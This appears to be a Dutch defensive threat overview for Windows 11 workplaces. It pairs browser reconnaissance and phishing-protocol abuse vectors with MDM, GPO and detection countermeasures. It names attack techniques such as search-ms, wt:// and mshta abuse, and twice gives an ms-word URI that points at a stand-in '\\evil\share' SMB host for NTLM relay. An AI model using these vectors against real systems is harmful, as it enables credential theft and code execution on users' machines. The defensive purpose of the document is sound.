Web-Recon — gevaren-analyse + tegenmaatregelen
Onderstaand een overzicht van wat elke website uw werkplek kan onthullen of forceren — gegroepeerd op de barrière die overwonnen moet worden, met per categorie de toepasselijke organisatorische en technische tegenmaatregelen. Geen 0-days, geen browser-exploits: alleen functionaliteit die volgens spec werkt zoals bedoeld.
A. Passive recon — zonder klik
Wat lekt zodra de pagina laadt.
| Aanvalsvector | Tegenmaatregel |
|---|---|
| midOS + browser-fingerprint via User-Agent + Sec-CH-UA-* | Microsoft Edge for Business (MDM): EnableClientHints=Disabled. Network: reverse-proxy strip Sec-CH-UA-* outbound (lastig — TLS-encrypted client→edge). |
midGPU-vendor + driver-versie via WebGL UNMASKED_RENDERER | Edge MDM: beperk WebGL — WebGLEnabled=Disabled voor security-gevoelige user-groups. Note: breekt veel sites. |
| midGeïnstalleerde fonts (Calibri/Cambria = Office, JetBrains/Cascadia = developer) | Browser: geen directe block; OS: Win11 standard fonts onveranderd laten. Beperken via Privacy Sandbox / FedCM. Geen breed-effectieve mitigatie. |
| highWebRTC LAN-IP-leak (ook achter VPN!) + mDNS-hostname | Edge MDM: WebRtcLocalhostIpHandling=disable_non_proxied_udp. Chrome MDM: idem. VPN: force-tunnel + DNS-leak-bescherming. |
| midCanvas/audio fingerprint — unieke device-ID | Brave / Tor Browser: ingebouwde randomisation. Edge/Chrome: geen native bescherming; Privacy Sandbox initiatief loopt. Anti-fingerprint extensions kunnen, maar conflict met enterprise-MDM. |
| lowTijdzone, taal, scherm-config | Acceptabel risico voor de meeste org's. Vermijd ze niet — bescherm hogere-risico vectoren. |
B. Server-side recon
| Aanvalsvector | Tegenmaatregel |
|---|---|
| highPubliek IP + ASN/ISP-resolve → bedrijfs-locatie identificatie | Network: outbound via centrale proxy met gedeeld externe-IP; VPN: commercial VPN voor mobile workforce; WAF/CDN: Cloudflare e.d. maskeert origin-IP. |
| midX-Forwarded-For / Via — proxy-chain disclosure | Edge-proxy: X-Forwarded-* headers strippen aan de uitgang. Veel default-configs lekken interne proxy-IPs. |
| lowAccept-Language / Accept-Encoding | Accept-Language verklapt user-taal, mogelijk land-hint. Acceptabel risico. |
C. Eén klik — geen permission-popup
| Aanvalsvector | Tegenmaatregel |
|---|---|
| highClipboard write — paste-jacking voor RCE via terminal-paste | Edge MDM: DefaultClipboardSetting=2 (block) of 3 (ask). Awareness training: nooit blindelings plakken in terminal. EDR/DLP: alert op verdachte clipboard-content vóór terminal-paste. |
| midDownload `.bat`/`.exe`/`.lnk` zonder confirmation | Browser: SmartScreen + Mark-of-the-Web behouden. OS: AppLocker / WDAC block unsigned executables. GPO: "Open File - Security Warning" voor MOTW-bestanden. |
highURL-handlers ms-settings:, shell:, ms-search: | GPO Edge: URLAllowlist / URLBlocklist voor scheme's. Win11: App default for URI scheme per scheme; remove handlers per HKEY_CLASSES_ROOT (zorg-vol). |
highNTLM-relay via ms-word:ofe|u|\\evil\share\bait.docx | GPO: "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = "Deny all". Firewall: outbound TCP/445 (SMB) blokken. Defender: ASR-rule "Block credential stealing from LSASS". |
| midTab-napping — favicon/titel-wissel naar phishing | Lastig technisch te mitigeren. Awareness: verifieer URL-bar, niet alleen tab. Browser: Edge's TabsAlwaysVisible policy + URL-bar-locking. |
D. Permission-vragend
| Aanvalsvector | Tegenmaatregel |
|---|---|
| highGeolocation + Camera + Microfoon | Edge MDM: DefaultGeolocationSetting=2, DefaultCameraSetting=2, DefaultMicrophoneSetting=2. Win11 Privacy: systeem-level disable per app. |
| midClipboard read | MDM: DefaultClipboardSetting=2. OS: Win11 clipboard-history uitschakelen voor security-rollen. |
| highFile System Access (read/write in user-folder na grant) | Edge MDM: DefaultFileSystemReadGuardSetting=2, DefaultFileSystemWriteGuardSetting=2. Awareness: geen folder-pickers gebruiken op onbekende sites. |
| highBluetooth / USB / HID / Serial — toegang tot fysieke devices | MDM: DefaultWebBluetoothGuardSetting=2, DefaultWebUsbGuardSetting=2, DefaultWebHidGuardSetting=2, DefaultSerialGuardSetting=2. Default: blokkeer; allowlist voor specifieke origins. |
| midWebAuthn enumeration / passkey-info | Scope per relying-party — beperkt risico. Awareness: phishing-resistant passkeys op gevoelige accounts. |
F. Phishing-protocol-abuse — klik → AsInvoker code-execution
Hoe een gewone link tot user-context code-uitvoering leidt. Eindstaat is altijd AsInvoker (geen admin), wat genoeg is voor recon, persistence, exfil + UAC-bypass-poging.
| Aanvalsvector | Tegenmaatregel |
|---|---|
highF1 — search-ms: protocol met SMB-share | Edge MDM: URLBlocklist=search-ms:*. OS: WebClient-service uitschakelen via GPO. SOC: alert op outbound TCP/445 naar onbekende hosts. |
highF2 — wt:// Windows Terminal handler | Edge MDM: URLBlocklist=wt:*. SOC: Sysmon alert op wt.exe child-process van outlook.exe/msedge.exe. |
highF3 — .hta via mshta.exe | AppLocker: block mshta.exe (DefaultRule of Path-rule). GPO: Software Restriction Policy met %SYSTEMROOT%\system32\mshta.exe = disabled. SOC: Sysmon alert op mshta.exe execution. |
highF4 — .lnk met PowerShell-target (in password-ZIP) | Email-gateway: block password-protected archives (Defender for Office 365 Safe Attachments). ASR: "Block executable content from email client and webmail". Awareness: nooit blind ZIP-content runnen. |
lowF5 — ms-msdt: (Follina CVE-2022-30190) | Gepatched in Win11 22H2+. Concept blijft: andere ms-*:-handlers kunnen vergelijkbare gaten hebben — periodiek pentest. |
highF6 — ms-word:ofe|u|\\evil\share\bait.docx SMB-NTLM-relay | GPO: "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = "Deny all". Firewall: outbound TCP/445 blokken. ASR: "Block credential stealing from LSASS". |
midF7 — .iso/.img mount | OS: up-to-date Win11 22H2+ propageert MOTW door ISO. AppLocker: Path-rule op mounted-drive-letters. Email-gateway: block .iso attachments (default in M365 sinds 2023). |
midF8 — .scr screensaver = PE-binary | AppLocker: block .scr Path-rule of File-Hash-rule. Defender: on-execute scan. |
lowF9 — ClickOnce .application | Edge MDM: ClickOnce-prompt sinds 2020. GPO: ClickOnceEnabled=false. |
midF10 — file:// of \\server\share\bait.bat WebDAV | OS: WebClient-service uitschakelen via GPO. Firewall: outbound 80/443 naar onbekende WebDAV-servers blokken (lastig zonder URL-filter). |
| highF11 — Office-doc + VBA-macro | Office-policies: macro's uit internet by default block (default sinds 2022). ASR: "Block Office child processes" + "Block Win32 API calls from Office macros". |
midF12 — OneNote .one embedded payload | OneNote blokkeert riskante embeds sinds 2023. ASR: "Block process creations originating from PSExec/WMI" deelt overlap. |
midF13 — .svg met embedded <script> | Email-gateway: block .svg attachments of strip <script>-tags. Browser: CSP voor embedded apps. |
midF14 — .ics calendar-invite met malicious URL | Email-gateway: HTML-stripping voor ms-*:-schemes in calendar-bodies. Outlook MDM: warn-on-unknown-organizer. |
Phishing-simulatie templates voor interne training: PHISHING_SIMULATIONS.md · Volledige impact-analyse: MAX_IMPACT_REPORT.md · Outlook awareness: phishing-outlook.html.
E. Network side-channel
| Aanvalsvector | Tegenmaatregel |
|---|---|
midInternal LAN-portscan via fetch(..., no-cors) + timing | Network: microsegmentatie — clients in eigen VLAN zonder oost-west toegang. IDS: alert op "many failed fetches naar interne RFC1918". Browser: CORS-policy strikt, maar timing-side-channel blijft. |
| midlocalhost-probe (Spotify, Steam, Discord, IDE-debug) | EDR: alert op JS-initiated localhost-fetches. Browser: Private Network Access (PNA) — Chrome rollout in progress, geeft preflight voor LAN-/localhost-requests. |
| highWebRTC publieke + lokale IP (zelfs achter VPN) | Zie A — WebRtcLocalhostIpHandling=disable_non_proxied_udp. VPN: systeem-niveau VPN met split-tunnel-disable + DNS-leak-protection. |
Generieke maatregelen voor MDM-beheerde Win11-werkplekken
| Laag | Maatregelen |
|---|---|
| Browser-policy (Edge / Chrome) | Centrale MDM-rollout van permissions-defaults (camera/mic/geolocation/clipboard/USB/Bluetooth/HID/Serial/File-System) op BlockGuardSetting=2. Allowlist voor benodigde origins. |
| DNS | DNS-filtering (Cisco Umbrella, Cloudflare Gateway, NextDNS) — blokkeer threat-feeds + categorieën zoals "uncategorized", "newly-registered". |
| EDR + ASR-rules | Defender ASR-set: block credential-stealing from LSASS, block process-creation from Office, block scripts via PSExec/WMI. CrowdStrike/SentinelOne: equivalente policies. |
| Network segmentation | Microsegmentatie + zero-trust — clients in eigen broadcast-domain, oost-west traffic via inspecting gateway. Reduceert E1/E2 impact. |
| Awareness | Train medewerkers op: clipboard-content-vóór-paste, URL-handler-prompts negeren tenzij verwacht, geen file-picker op onbekende sites, geen camera/mic permission op onbekende sites. |
| Logging + detection | Browser-telemetrie (Edge for Business) + EDR-fed SIEM. Alert op clipboard-read events op onbekende origins, op file-picker grant op onbekende origins. |
iCt Horse — terug naar de test · terug naar WPB-test hoofdpagina